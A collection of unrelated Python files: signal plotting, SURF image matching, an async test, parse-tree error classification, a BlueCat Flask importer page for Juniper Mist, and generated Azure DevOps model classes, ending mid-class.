averageTime,averagePower = chopPower(t,p)
# figure('chopped Powers')
plot(averageTime,averagePower,'bo',markersize = 6.)
ylabel('Power (dB)')
xlabel('Index')
show()
|
from numpy import float32, vstack, ones, zeros
from cv2 import SURF, FlannBasedMatcher, cvtColor, COLOR_BGR2GRAY
def get_points(c_img1, c_img2):
# convert to gray
img1 = cvtColor(c_img1, COLOR_BGR2GRAY)
img2 = cvtColor(c_img2, COLOR_BGR2GRAY)
surf = SURF() # Initiate SURF detector
# find the key points and descriptors with SURF
kp1, des1 = surf.detectAndCompute(img1, None)
kp2, des2 = surf.detectAndCompute(img2, None)
my_flan_index_tree = 0
index_params = dict(algorithm=my_flan_index_tree, trees=6)
search_params = dict(checks=50)
my_flan = FlannBasedMatcher(index_params, search_params)
matches = my_flan.knnMatch(des1, des2, k=2)
# store all the good matches as per Lowe's ratio test.
good = []
pts2 = []
pts1 = []
for m, n in matches:
if m.distance < 0.9*n.distance:
good.append(m)
pts1 = float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
pts2 = float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
# get color of key points
    n_points = len(pts1)
    color1 = zeros((n_points, 1, 3))
    color2 = zeros((n_points, 1, 3))
    color = zeros((n_points, 1, 3), dtype=int)
    for i in range(n_points):  # include the first and last matches too
        color1[i] = c_img1[int(pts1[i][0][1]), int(pts1[i][0][0])]
        color2[i] = c_img2[int(pts2[i][0][1]), int(pts2[i][0][0])]
        color[i] = (color1[i] + color2[i]) / 2  # avg of colors
    # convert the 2D features into homogeneous coordinates (3xN arrays)
pt1 = pts1.reshape((pts1.shape[0], 2)).T
pt1 = vstack((pt1, ones(pt1.shape[1])))
pt2 = pts2.reshape((pts2.shape[0], 2)).T
pt2 = vstack((pt2, ones(pt2.shape[1])))
return pt1, pt2, color
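# Usage sketch (added; illustrative paths, requires an OpenCV build with SURF):
#   from cv2 import imread
#   pt1, pt2, color = get_points(imread('left.jpg'), imread('right.jpg'))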
|
# -*- coding: utf-8 -*-
# test/unit/coro/test_maxruntime.py
# Copyright (C) 2016 authors and contributors (see AUTHORS file)
#
# This module is released under the MIT License.
"""Test maxruntime() coro func"""
# ============================================================================
# Imports
# ============================================================================
# Stdlib imports
import asyncio
from datetime import timedelta
# Third-party imports
from pandas import Timedelta
import pytest
# Local imports
from loadlimit.core import BaseLoop
from loadlimit.coro import maxruntime
# ============================================================================
# Tests
# ============================================================================
@pytest.mark.parametrize('cls', [Timedelta, timedelta])
def test_stops_event(testloop, cls):
"""Stops the event loop after the specified amount of time"""
val = 0
async def run():
"""run"""
nonlocal val
while True:
val = val + 1
await asyncio.sleep(0.1)
end = cls(seconds=1)
with BaseLoop() as main:
for coro in [maxruntime(end), run()]:
asyncio.ensure_future(coro)
main.start()
assert val >= 10
@pytest.mark.parametrize('val', [42, 4.2, '42', [42], (42, )])
@pytest.mark.asyncio
async def test_not_timedelta(val):
"""Raises error if delta arg is not a timedelta instance"""
expected = ('delta expected timedelta, got {} instead'.
format(type(val).__name__))
with pytest.raises(TypeError) as err:
await maxruntime(val)
assert err.value.args == (expected, )
# ============================================================================
#
# ============================================================================
|
#!/usr/bin/env python
import sys
import ptb, error_tree, repair_tree, bracket_errors, error_group
import s_single_word, s_unary, s_attachment
# Other ideas:
# NP internal structure:
# - a collection of extra NP brackets inside an NP, with only NPs below
# - a collection of missing NP brackets inside an NP, with only NPs below
def check_for_matching_errors(ungrouped, group, gold, test):
spans, span_set = test.get_spans()
to_remove = []
for merror in ungrouped:
if merror.missing:
span = merror.node.span
if span in span_set:
if merror.node.label in span_set[span]:
trees = span_set[span][merror.node.label]
found = False
for tree in trees:
if tree.extra:
for eerror in ungrouped:
if eerror.extra and eerror.node == tree.basis_tree:
to_remove.append(merror)
to_remove.append(eerror)
tree.extra = False
found = True
break
if found:
break
for error in to_remove:
ungrouped.remove(error)
group.errors.append(error)
return test
def detect_error_types(error_set, gold_tree, test_tree):
init_error_count = len(error_set['miss']) + len(error_set['extra'])
ungrouped = []
for etype in error_set:
for error in error_set[etype]:
ungrouped.append(error)
bracket_errors.sort_by_depth(ungrouped)
init_ungrouped_length = len(ungrouped)
assert init_ungrouped_length == init_error_count
grouped = []
mutable_test = test_tree.copy()
# iterate through the errors until there is no change after an iteration
# Note - order of these is intentional
aggregators = [
s_unary.unary_error,
s_single_word.single_word_error,
s_attachment.attachment_error,
]
changed = True
while changed:
changed = False
### print mutable_test.colour_repr()
### for error in ungrouped:
### print error
### print
for func in aggregators:
plen = len(ungrouped), len(grouped)
tchanged, mutable_test = func(ungrouped, grouped, gold_tree, mutable_test)
if tchanged:
mutable_test = check_for_matching_errors(ungrouped, grouped[-1], gold_tree, mutable_test)
changed = True
remaining_errors = bracket_errors.get_errors(gold_tree, mutable_test)
return grouped, mutable_test, remaining_errors, ungrouped
def aggregate_error_types(groups):
# Further grouping the errors detected in the function above
counts = {'new Other': [0, 0, []]}
print "Aggregated errors"
for group in groups:
if group.classification is None:
group.determine_type()
if group.classification not in counts:
counts[group.classification] = [0, 0, []]
counts[group.classification][0] += 1
counts[group.classification][1] += len(group.errors)
counts[group.classification][2].append(group)
if 'new' not in group.classification:
counts['new Other'][0] += 1
counts['new Other'][1] += len(group.errors)
counts['new Other'][2].append(group)
stats = []
for count in counts:
stats.append((counts[count][0], count))
stats.sort()
for stat in stats:
print 'Aggregated Errors:',
print stat[0],
print stat[1],
print ' | ',
print counts[stat[1]][1] / float(stat[0]),
print counts[stat[1]][1]
if __name__ == '__main__':
if len(sys.argv) < 3:
print "Usage:\n%s <gold> <test>" % sys.argv[0]
print "The files should contain one parse per line, with a 1-1 mapping (use blank lines where there is a missing parse)."
print "Running doctest"
import doctest
doctest.testmod()
else:
gold_in = open(sys.argv[1])
test_in = open(sys.argv[2])
VERBOSE = len(sys.argv) > 3 and ('-v' in sys.argv[3] or '-V' in sys.argv[3])
error_groups = []
while True:
gold_text = gold_in.readline()
test_text = test_in.readline()
if gold_text == '' or test_text == '':
break
gold_text = gold_text.strip()
test_text = test_text.strip()
if len(gold_text) == 0 or len(test_text) == 0:
continue
if VERBOSE:
print gold_text
tree = ptb.PTB_Tree()
tree.set_by_text(gold_text)
if VERBOSE:
print tree
simple_tree = ptb.apply_collins_rules(tree)
if VERBOSE:
print simple_tree
if simple_tree is None:
continue
gold_tree = error_tree.Error_Tree()
gold_tree.set_by_ptb(simple_tree, tree)
if VERBOSE:
print gold_tree
if VERBOSE:
print test_text
tree = ptb.PTB_Tree()
tree.set_by_text(test_text)
if VERBOSE:
print tree
simple_tree = ptb.apply_collins_rules(tree)
if VERBOSE:
print simple_tree
test_tree = error_tree.Error_Tree()
test_tree.set_by_ptb(simple_tree, tree)
if VERBOSE:
print test_tree
gold_words = gold_tree.word_yield()
test_words = test_tree.word_yield()
if len(test_words.split()) != len(gold_words.split()):
print "Sentence lengths do not maych..."
print "Gold:", gold_words
print "Test:", test_words
error_set = bracket_errors.get_errors(gold_tree, test_tree)[0]
missing = bracket_errors.get_missing_errors(error_set, test_tree)
print test_tree.colour_repr(missing=missing).strip()
if len(error_set['miss']) > 0 or len(error_set['extra']) > 0:
print 'initial errors:', len(error_set['miss']), len(error_set['extra'])
aggregated_errors = detect_error_types(error_set, gold_tree, test_tree)
for group in aggregated_errors[0]:
group.determine_type()
print 'Class:', group.classification
print 'Fixes:',
for error in group.errors:
print error
error_groups.append(group)
error_set = bracket_errors.get_errors(gold_tree, aggregated_errors[1])[0]
missing = bracket_errors.get_missing_errors(error_set, aggregated_errors[1])
print 'remaining errors:', len(error_set['miss']), len(error_set['extra'])
for etype in error_set:
for error in error_set[etype]:
print "Error:", etype, error.node.label
group = error_group.Error_Group()
group.fields = {}
group.fields['old desc'] = "%s %s" % (etype, error.node.label)
group.desc = group.fields['old desc']
group.errors.append(error)
error_groups.append(group)
print aggregated_errors[1].colour_repr(missing=missing).strip()
print
aggregate_error_types(error_groups)
# Tricky sentence:
# The move leaves United Illuminating Co. and Northeast Utilities...
#
# TODO: It would be interesting to have a list of the phrases that form errors,
# in particular the missing constituents. The question is, why is this a
# constituent? Is it something you need world knowledge for?
|
# Copyright 2020 BlueCat Networks (USA) Inc. and its affiliates
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# By: Akira Goto ([email protected])
# Date: 2019-10-30
# Gateway Version: 19.8.1
# Description: Juniper Mist Importer page.py
# Various Flask framework items.
import os
import sys
import codecs
from flask import request, url_for, redirect, render_template, flash, g, jsonify
from wtforms.validators import URL, DataRequired
from wtforms import StringField, BooleanField, SubmitField
from bluecat.wtform_extensions import GatewayForm
from bluecat import route, util
import config.default_config as config
from main_app import app
from .mist_importer import MistImporter
def module_path():
encoding = sys.getfilesystemencoding()
return os.path.dirname(os.path.abspath(__file__))
def get_configuration():
configuration = None
if g.user:
configuration = g.user.get_api().get_configuration(config.default_configuration)
return configuration
class GenericFormTemplate(GatewayForm):
"""
Generic form Template
Note:
When updating the form, remember to make the corresponding changes to the workflow pages
"""
workflow_name = 'mist_importer'
workflow_permission = 'mist_importer_page'
text=util.get_text(module_path(), config.language)
require_message=text['require_message']
org_id = StringField(
label=text['label_org_id'],
validators=[DataRequired(message=require_message)]
)
api_token = StringField(
label=text['label_api_token'],
validators=[DataRequired(message=require_message)]
)
site_name = StringField(
label=text['label_site_name'],
validators=[DataRequired(message=require_message)]
)
include_matches = BooleanField(
label='',
default='checked'
)
include_ipam_only = BooleanField(
label='',
default='checked'
)
submit = SubmitField(label=text['label_submit'])
# The workflow name must be the first part of any endpoints defined in this file.
# If you break this rule, you will trip up on other people's endpoint names and
# chaos will ensue.
@route(app, '/mist_importer/mist_importer_endpoint')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def mist_importer_mist_importer_page():
form = GenericFormTemplate()
mist_importer = MistImporter.get_instance(debug=True)
value = mist_importer.get_value('org_id')
if value is not None:
form.org_id.data = value
value = mist_importer.get_value('api_token')
if value is not None:
form.api_token.data = value
value = mist_importer.get_value('site_name')
if value is not None:
form.site_name.data = value
value = mist_importer.get_value('include_matches')
if value is not None:
form.include_matches.data = value
value = mist_importer.get_value('include_ipam_only')
if value is not None:
form.include_ipam_only.data = value
return render_template(
'mist_importer_page.html',
form=form,
text=util.get_text(module_path(), config.language),
options=g.user.get_options(),
)
@route(app, '/mist_importer/load_col_model')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def load_col_model():
text=util.get_text(module_path(), config.language)
links = '<img src="{icon}" title="{title}" width="16" height="16">'
value_table = {
'UNKNOWN': links.format(icon='img/help.gif', title=text['label_state_unknown']),
'MATCH': links.format(icon='img/check.gif', title=text['label_state_match']),
'MISMATCH': links.format(icon='img/about.gif', title=text['label_state_mismatch']),
'RECLAIM': links.format(icon='img/data_delete.gif', title=text['label_state_reclaim'])
}
clients = [
{'index':'id', 'name':'id', 'hidden':True, 'sortable':False},
{'index':'network_id', 'name':'network_id', 'hidden':True, 'sortable':False},
{'index':'order', 'name':'order', 'hidden':True, 'sortable':False},
{'index':'name', 'name':'name', 'hidden':True, 'sortable':False},
{'index':'system', 'name':'system', 'hidden':True, 'sortable':False},
{'index':'detail_link', 'name':'detail_link', 'hidden':True, 'sortable':False},
{
'label': text['label_col_ipaddr'], 'index':'ipaddr', 'name':'ipaddr',
'width':100, 'align':'center', 'sortable':False
},
{
'label': text['label_col_macaddr'], 'index':'macaddr', 'name':'macaddr',
'width':130, 'align':'center', 'sortable':False
},
{
'label': text['label_col_name'], 'index':'linked_name', 'name':'linked_name',
'width':140, 'sortable':False
},
{
'label': text['label_col_system'], 'index':'system', 'name':'system',
'width':240, 'sortable':False
},
{
'label': text['label_col_state'], 'index':'state', 'name':'state',
'width':50, 'align':'center', 'sortable':False,
'formatter': 'select',
'formatoptions': {
'value': value_table
}
},
{
'label': text['label_col_lastfound'], 'index':'last_found', 'name':'last_found',
'width':140, 'align':'center', 'sortable':False,
'formatter': 'date',
'formatoptions': {
'srcformat': 'ISO8601Long',
'newformat': 'Y-m-d H:i:s',
'userLocalTime': True
}
}
]
return jsonify(clients)
@route(app, '/mist_importer/get_clients')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def get_clients():
clients = []
configuration = get_configuration()
if configuration is not None:
mist_importer = MistImporter.get_instance()
mist_importer.collect_clients(configuration)
clients = mist_importer.get_clients()
return jsonify(clients)
@route(app, '/mist_importer/load_clients')
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def load_clients():
mist_importer = MistImporter.get_instance()
clients = mist_importer.get_clients()
return jsonify(clients)
@route(app, '/mist_importer/update_config', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def update_config():
config = request.get_json()
mist_importer = MistImporter.get_instance()
mist_importer.set_value('org_id', config['org_id'])
mist_importer.set_value('api_token', config['api_token'])
mist_importer.set_value('site_name', config['site_name'])
mist_importer.set_value('include_matches', config['include_matches'])
mist_importer.set_value('include_ipam_only', config['include_ipam_only'])
mist_importer.save()
return jsonify(success=True)
@route(app, '/mist_importer/push_selected_clients', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def push_selected_clients():
new_clients = []
client_ids = request.get_json()
mist_importer = MistImporter.get_instance()
for client in mist_importer.get_clients():
if client['id'] in client_ids:
new_clients.append(client)
mist_importer.set_clients(new_clients)
return jsonify(success=True)
@route(app, '/mist_importer/clear_clients', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def clear_clients():
mist_importer = MistImporter.get_instance()
mist_importer.clear_clients()
return jsonify(success=True)
@route(app, '/mist_importer/form', methods=['POST'])
@util.workflow_permission_required('mist_importer_page')
@util.exception_catcher
def mist_importer_mist_importer_page_form():
form = GenericFormTemplate()
text=util.get_text(module_path(), config.language)
if form.validate_on_submit():
mist_importer = MistImporter.get_instance()
mist_importer.set_value('org_id', form.org_id.data)
mist_importer.set_value('api_token', form.api_token.data)
mist_importer.set_value('site_name', form.site_name.data)
mist_importer.set_value('include_matches', form.include_matches.data)
mist_importer.set_value('include_ipam_only', form.include_ipam_only.data)
mist_importer.save()
configuration = get_configuration()
mist_importer.import_clients(configuration)
mist_importer.collect_clients(configuration)
# Put form processing code here
g.user.logger.info('SUCCESS')
flash(text['imported_message'], 'succeed')
return redirect(url_for('mist_importermist_importer_mist_importer_page'))
else:
g.user.logger.info('Form data was not valid.')
return render_template(
'mist_importer_page.html',
form=form,
text=util.get_text(module_path(), config.language),
options=g.user.get_options(),
)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class AadOauthTokenRequest(Model):
"""
:param refresh:
:type refresh: bool
:param resource:
:type resource: str
:param tenant_id:
:type tenant_id: str
:param token:
:type token: str
"""
_attribute_map = {
'refresh': {'key': 'refresh', 'type': 'bool'},
'resource': {'key': 'resource', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'token': {'key': 'token', 'type': 'str'}
}
def __init__(self, refresh=None, resource=None, tenant_id=None, token=None):
super(AadOauthTokenRequest, self).__init__()
self.refresh = refresh
self.resource = resource
self.tenant_id = tenant_id
self.token = token
class AadOauthTokenResult(Model):
"""
:param access_token:
:type access_token: str
:param refresh_token_cache:
:type refresh_token_cache: str
"""
_attribute_map = {
'access_token': {'key': 'accessToken', 'type': 'str'},
'refresh_token_cache': {'key': 'refreshTokenCache', 'type': 'str'}
}
def __init__(self, access_token=None, refresh_token_cache=None):
super(AadOauthTokenResult, self).__init__()
self.access_token = access_token
self.refresh_token_cache = refresh_token_cache
class AuthenticationSchemeReference(Model):
"""
:param inputs:
:type inputs: dict
:param type:
:type type: str
"""
_attribute_map = {
'inputs': {'key': 'inputs', 'type': '{str}'},
'type': {'key': 'type', 'type': 'str'}
}
def __init__(self, inputs=None, type=None):
super(AuthenticationSchemeReference, self).__init__()
self.inputs = inputs
self.type = type
class AuthorizationHeader(Model):
"""
:param name: Gets or sets the name of authorization header.
:type name: str
:param value: Gets or sets the value of authorization header.
:type value: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, name=None, value=None):
super(AuthorizationHeader, self).__init__()
self.name = name
self.value = value
class AzureManagementGroup(Model):
"""
Azure Management Group
:param display_name: Display name of azure management group
:type display_name: str
:param id: Id of azure management group
:type id: str
:param name: Azure management group name
:type name: str
:param tenant_id: Id of tenant from which azure management group belongs
:type tenant_id: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'}
}
def __init__(self, display_name=None, id=None, name=None, tenant_id=None):
super(AzureManagementGroup, self).__init__()
self.display_name = display_name
self.id = id
self.name = name
self.tenant_id = tenant_id
class AzureManagementGroupQueryResult(Model):
"""
Azure management group query result
:param error_message: Error message in case of an exception
:type error_message: str
:param value: List of azure management groups
:type value: list of :class:`AzureManagementGroup <azure.devops.v5_1.task_agent.models.AzureManagementGroup>`
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'value': {'key': 'value', 'type': '[AzureManagementGroup]'}
}
def __init__(self, error_message=None, value=None):
super(AzureManagementGroupQueryResult, self).__init__()
self.error_message = error_message
self.value = value
class AzureSubscription(Model):
"""
:param display_name:
:type display_name: str
:param subscription_id:
:type subscription_id: str
:param subscription_tenant_id:
:type subscription_tenant_id: str
:param subscription_tenant_name:
:type subscription_tenant_name: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
'subscription_tenant_id': {'key': 'subscriptionTenantId', 'type': 'str'},
'subscription_tenant_name': {'key': 'subscriptionTenantName', 'type': 'str'}
}
def __init__(self, display_name=None, subscription_id=None, subscription_tenant_id=None, subscription_tenant_name=None):
super(AzureSubscription, self).__init__()
self.display_name = display_name
self.subscription_id = subscription_id
self.subscription_tenant_id = subscription_tenant_id
self.subscription_tenant_name = subscription_tenant_name
class AzureSubscriptionQueryResult(Model):
"""
:param error_message:
:type error_message: str
:param value:
:type value: list of :class:`AzureSubscription <azure.devops.v5_1.task_agent.models.AzureSubscription>`
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'value': {'key': 'value', 'type': '[AzureSubscription]'}
}
def __init__(self, error_message=None, value=None):
super(AzureSubscriptionQueryResult, self).__init__()
self.error_message = error_message
self.value = value
class ClientCertificate(Model):
"""
:param value: Gets or sets the value of client certificate.
:type value: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, value=None):
super(ClientCertificate, self).__init__()
self.value = value
class DataSource(Model):
"""
:param authentication_scheme:
:type authentication_scheme: :class:`AuthenticationSchemeReference <azure.devops.v5_1.task_agent.models.AuthenticationSchemeReference>`
:param endpoint_url:
:type endpoint_url: str
:param headers:
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param name:
:type name: str
:param resource_url:
:type resource_url: str
:param result_selector:
:type result_selector: str
"""
_attribute_map = {
'authentication_scheme': {'key': 'authenticationScheme', 'type': 'AuthenticationSchemeReference'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'name': {'key': 'name', 'type': 'str'},
'resource_url': {'key': 'resourceUrl', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'}
}
def __init__(self, authentication_scheme=None, endpoint_url=None, headers=None, name=None, resource_url=None, result_selector=None):
super(DataSource, self).__init__()
self.authentication_scheme = authentication_scheme
self.endpoint_url = endpoint_url
self.headers = headers
self.name = name
self.resource_url = resource_url
self.result_selector = result_selector
class DataSourceBindingBase(Model):
"""
Represents binding of data source for the service endpoint request.
:param callback_context_template: Pagination format supported by this data source(ContinuationToken/SkipTop).
:type callback_context_template: str
:param callback_required_template: Subsequent calls needed?
:type callback_required_template: str
:param data_source_name: Gets or sets the name of the data source.
:type data_source_name: str
:param endpoint_id: Gets or sets the endpoint Id.
:type endpoint_id: str
:param endpoint_url: Gets or sets the url of the service endpoint.
:type endpoint_url: str
:param headers: Gets or sets the authorization headers.
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.microsoft._team_foundation._distributed_task._common._contracts.models.AuthorizationHeader>`
:param initial_context_template: Defines the initial value of the query params
:type initial_context_template: str
:param parameters: Gets or sets the parameters for the data source.
:type parameters: dict
:param request_content: Gets or sets http request body
:type request_content: str
:param request_verb: Gets or sets http request verb
:type request_verb: str
:param result_selector: Gets or sets the result selector.
:type result_selector: str
:param result_template: Gets or sets the result template.
:type result_template: str
:param target: Gets or sets the target of the data source.
:type target: str
"""
_attribute_map = {
'callback_context_template': {'key': 'callbackContextTemplate', 'type': 'str'},
'callback_required_template': {'key': 'callbackRequiredTemplate', 'type': 'str'},
'data_source_name': {'key': 'dataSourceName', 'type': 'str'},
'endpoint_id': {'key': 'endpointId', 'type': 'str'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'initial_context_template': {'key': 'initialContextTemplate', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{str}'},
'request_content': {'key': 'requestContent', 'type': 'str'},
'request_verb': {'key': 'requestVerb', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'},
'result_template': {'key': 'resultTemplate', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'}
}
def __init__(self, callback_context_template=None, callback_required_template=None, data_source_name=None, endpoint_id=None, endpoint_url=None, headers=None, initial_context_template=None, parameters=None, request_content=None, request_verb=None, result_selector=None, result_template=None, target=None):
super(DataSourceBindingBase, self).__init__()
self.callback_context_template = callback_context_template
self.callback_required_template = callback_required_template
self.data_source_name = data_source_name
self.endpoint_id = endpoint_id
self.endpoint_url = endpoint_url
self.headers = headers
self.initial_context_template = initial_context_template
self.parameters = parameters
self.request_content = request_content
self.request_verb = request_verb
self.result_selector = result_selector
self.result_template = result_template
self.target = target
class DataSourceDetails(Model):
"""
:param data_source_name:
:type data_source_name: str
:param data_source_url:
:type data_source_url: str
:param headers:
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param parameters:
:type parameters: dict
:param resource_url:
:type resource_url: str
:param result_selector:
:type result_selector: str
"""
_attribute_map = {
'data_source_name': {'key': 'dataSourceName', 'type': 'str'},
'data_source_url': {'key': 'dataSourceUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'parameters': {'key': 'parameters', 'type': '{str}'},
'resource_url': {'key': 'resourceUrl', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'}
}
def __init__(self, data_source_name=None, data_source_url=None, headers=None, parameters=None, resource_url=None, result_selector=None):
super(DataSourceDetails, self).__init__()
self.data_source_name = data_source_name
self.data_source_url = data_source_url
self.headers = headers
self.parameters = parameters
self.resource_url = resource_url
self.result_selector = result_selector
class DependencyBinding(Model):
"""
:param key:
:type key: str
:param value:
:type value: str
"""
_attribute_map = {
'key': {'key': 'key', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, key=None, value=None):
super(DependencyBinding, self).__init__()
self.key = key
self.value = value
class DependencyData(Model):
"""
:param input:
:type input: str
:param map:
:type map: list of { key: str; value: [{ key: str; value: str }] }
"""
_attribute_map = {
'input': {'key': 'input', 'type': 'str'},
'map': {'key': 'map', 'type': '[{ key: str; value: [{ key: str; value: str }] }]'}
}
def __init__(self, input=None, map=None):
super(DependencyData, self).__init__()
self.input = input
self.map = map
class DependsOn(Model):
"""
:param input:
:type input: str
:param map:
:type map: list of :class:`DependencyBinding <azure.devops.v5_1.task_agent.models.DependencyBinding>`
"""
_attribute_map = {
'input': {'key': 'input', 'type': 'str'},
'map': {'key': 'map', 'type': '[DependencyBinding]'}
}
def __init__(self, input=None, map=None):
super(DependsOn, self).__init__()
self.input = input
self.map = map
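# Minimal sketch showing how DependsOn composes DependencyBinding entries:
# the dependent field resolves to the bound value when the input named
# 'project' matches a binding's key. All names are illustrative.
def _example_depends_on():
    return DependsOn(
        input='project',
        map=[DependencyBinding(key='fabrikam', value='https://example.com/fabrikam')],
    )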
class DeploymentGroupCreateParameter(Model):
"""
Properties to create Deployment group.
:param description: Description of the deployment group.
:type description: str
:param name: Name of the deployment group.
:type name: str
:param pool: Deployment pool in which deployment agents are registered. This property is obsolete and is kept for backward compatibility; it will be marked obsolete explicitly by M132.
:type pool: :class:`DeploymentGroupCreateParameterPoolProperty <azure.devops.v5_1.task_agent.models.DeploymentGroupCreateParameterPoolProperty>`
:param pool_id: Identifier of the deployment pool in which deployment agents are registered.
:type pool_id: int
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'DeploymentGroupCreateParameterPoolProperty'},
'pool_id': {'key': 'poolId', 'type': 'int'}
}
def __init__(self, description=None, name=None, pool=None, pool_id=None):
super(DeploymentGroupCreateParameter, self).__init__()
self.description = description
self.name = name
self.pool = pool
self.pool_id = pool_id
class DeploymentGroupCreateParameterPoolProperty(Model):
"""
Properties of Deployment pool to create Deployment group.
:param id: Deployment pool identifier.
:type id: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'}
}
def __init__(self, id=None):
super(DeploymentGroupCreateParameterPoolProperty, self).__init__()
self.id = id
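# Sketch: building a DeploymentGroupCreateParameter. pool_id is preferred
# over the obsolete pool property (see the docstring above); the id 42 is a
# hypothetical deployment pool identifier.
def _example_deployment_group_create():
    return DeploymentGroupCreateParameter(
        name='web-tier',
        description='Targets hosting the web front end',
        pool_id=42,
    )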
class DeploymentGroupMetrics(Model):
"""
Deployment group metrics.
:param columns_header: List of deployment group properties and the types of metrics provided for those properties.
:type columns_header: :class:`MetricsColumnsHeader <azure.devops.v5_1.task_agent.models.MetricsColumnsHeader>`
:param deployment_group: Deployment group.
:type deployment_group: :class:`DeploymentGroupReference <azure.devops.v5_1.task_agent.models.DeploymentGroupReference>`
:param rows: Values of properties and the metrics. E.g. 1: total count of deployment targets for which 'TargetState' is 'offline'. E.g. 2: Average time of deployment to the deployment targets for which 'LastJobStatus' is 'passed' and 'TargetState' is 'online'.
:type rows: list of :class:`MetricsRow <azure.devops.v5_1.task_agent.models.MetricsRow>`
"""
_attribute_map = {
'columns_header': {'key': 'columnsHeader', 'type': 'MetricsColumnsHeader'},
'deployment_group': {'key': 'deploymentGroup', 'type': 'DeploymentGroupReference'},
'rows': {'key': 'rows', 'type': '[MetricsRow]'}
}
def __init__(self, columns_header=None, deployment_group=None, rows=None):
super(DeploymentGroupMetrics, self).__init__()
self.columns_header = columns_header
self.deployment_group = deployment_group
self.rows = rows
class DeploymentGroupReference(Model):
"""
Deployment group reference. This is useful for referring to a deployment group from another object.
:param id: Deployment group identifier.
:type id: int
:param name: Name of the deployment group.
:type name: str
:param pool: Deployment pool in which deployment agents are registered.
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project: Project to which the deployment group belongs.
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'}
}
def __init__(self, id=None, name=None, pool=None, project=None):
super(DeploymentGroupReference, self).__init__()
self.id = id
self.name = name
self.pool = pool
self.project = project
class DeploymentGroupUpdateParameter(Model):
"""
Deployment group update parameter.
:param description: Description of the deployment group.
:type description: str
:param name: Name of the deployment group.
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(DeploymentGroupUpdateParameter, self).__init__()
self.description = description
self.name = name
class DeploymentMachine(Model):
"""
Deployment target.
:param agent: Deployment agent.
:type agent: :class:`TaskAgent <azure.devops.v5_1.task_agent.models.TaskAgent>`
:param id: Deployment target Identifier.
:type id: int
:param properties: Properties of the deployment target.
:type properties: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param tags: Tags of the deployment target.
:type tags: list of str
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgent'},
'id': {'key': 'id', 'type': 'int'},
'properties': {'key': 'properties', 'type': 'object'},
'tags': {'key': 'tags', 'type': '[str]'}
}
def __init__(self, agent=None, id=None, properties=None, tags=None):
super(DeploymentMachine, self).__init__()
self.agent = agent
self.id = id
self.properties = properties
self.tags = tags
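# Sketch: a deployment target is essentially an agent plus tags; tags drive
# which targets a deployment phase selects. Values here are placeholders.
def _example_deployment_machine():
    return DeploymentMachine(id=7, tags=['web', 'canary'])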
class DeploymentMachineGroupReference(Model):
"""
:param id:
:type id: int
:param name:
:type name: str
:param pool:
